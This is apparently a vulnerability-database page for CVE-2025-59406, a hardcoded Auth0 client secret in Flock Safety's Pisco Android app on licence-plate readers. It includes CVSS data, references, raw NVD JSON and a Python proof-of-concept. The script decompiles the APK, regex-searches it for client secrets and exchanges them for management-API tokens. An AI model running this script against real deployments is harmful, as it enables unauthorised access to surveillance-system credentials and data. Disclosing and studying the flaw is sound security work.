Security Vulnerability Report
CVE-2025-59406 CVSS 6.2 MEDIUM

Published: 2025-10-02 17:16:07
Last Modified: 2025-10-24 17:27:13

Description

The Flock Safety Pisco com.flocksafety.android.pisco application 6.21.11 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) has a cleartext Auth0 client secret in its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover this OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:flocksafety:flock_safety:6.21.11:*:*:*:*:android:*:* - VULNERABLE
com.flocksafety.android.pisco 6.21.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59406 PoC - Extract Auth0 Client Secret from Flock Safety Pisco APK
# This PoC demonstrates how to extract the hardcoded Auth0 client secret
import subprocess
import re
import os

import requests


def extract_auth0_secret(apk_path):
    """
    Extract Auth0 client secret from Flock Safety Pisco Android APK
    """
    # Step 1: Decompile APK using jadx or apktool
    output_dir = "decompiled_pisco"
    # Using jadx for decompilation; an argument list avoids shell interpretation
    # of the path and check=True surfaces a failed decompile instead of
    # silently scanning an empty directory
    subprocess.run(["jadx", "-d", output_dir, apk_path], check=True)

    # Step 2: Search for Auth0 configuration patterns in decompiled source
    auth0_patterns = [
        r'client_secret["\s:=]+["\']([A-Za-z0-9_-]+)["\']',
        r'AUTH0_CLIENT_SECRET["\s:=]+["\']([A-Za-z0-9_-]+)["\']',
        r'com\.auth0\.client\.secret["\s:=]+["\']([A-Za-z0-9_-]+)["\']',
        r'"client_secret"\s*:\s*"([A-Za-z0-9_-]+)"',
    ]
    secrets_found = []

    # Step 3: Walk through decompiled files and search for secrets
    for root, dirs, files in os.walk(output_dir):
        for file in files:
            if file.endswith(('.java', '.kt', '.json', '.xml', '.properties')):
                filepath = os.path.join(root, file)
                with open(filepath, 'r', errors='ignore') as f:
                    content = f.read()
                for pattern in auth0_patterns:
                    matches = re.findall(pattern, content)
                    for match in matches:
                        secrets_found.append({
                            'file': filepath,
                            'secret': match
                        })
    return secrets_found


def exploit_auth0_secret(client_id, client_secret, domain):
    """
    Use extracted credentials to perform unauthorized Auth0 operations
    """
    # Attempt to obtain access token using stolen client credentials
    token_url = f"https://{domain}/oauth/token"
    payload = {
        'grant_type': 'client_credentials',
        'client_id': client_id,
        'client_secret': client_secret,
        'audience': f'https://{domain}/api/v2/'
    }
    response = requests.post(token_url, json=payload)
    if response.status_code == 200:
        token = response.json().get('access_token')
        print(f"[+] Successfully obtained access token: {token[:20]}...")
        return token
    else:
        print(f"[-] Failed to obtain token: {response.text}")
        return None


# Usage
if __name__ == "__main__":
    apk_path = "com.flocksafety.android.pisco_6.21.11.apk"
    secrets = extract_auth0_secret(apk_path)
    for secret_info in secrets:
        print(f"[!] Found Auth0 secret in {secret_info['file']}")
        print(f"    Secret: {secret_info['secret']}")
    # Example: Use the extracted secret
    # token = exploit_auth0_secret(client_id, client_secret, 'flocksafety.auth0.com')

References

https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/ (Exploit, Third Party Advisory)
https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf (Exploit, Third Party Advisory)
https://www.flocksafety.com/products (Product)
https://www.flocksafety.com/products/license-plate-readers (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59406",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-02T17:16:06.880",
    "lastModified": "2025-10-24T17:27:12.890",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Flock Safety Pisco com.flocksafety.android.pisco application 6.21.11 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) has a cleartext Auth0 client secret in its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover this OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-319"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:flocksafety:flock_safety:6.21.11:*:*:*:*:android:*:*",
                "matchCriteriaId": "0CD8C06F-A79E-4CBE-80EF-7EB7CAB361C1"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.flocksafety.com/products",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://www.flocksafety.com/products/license-plate-readers",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}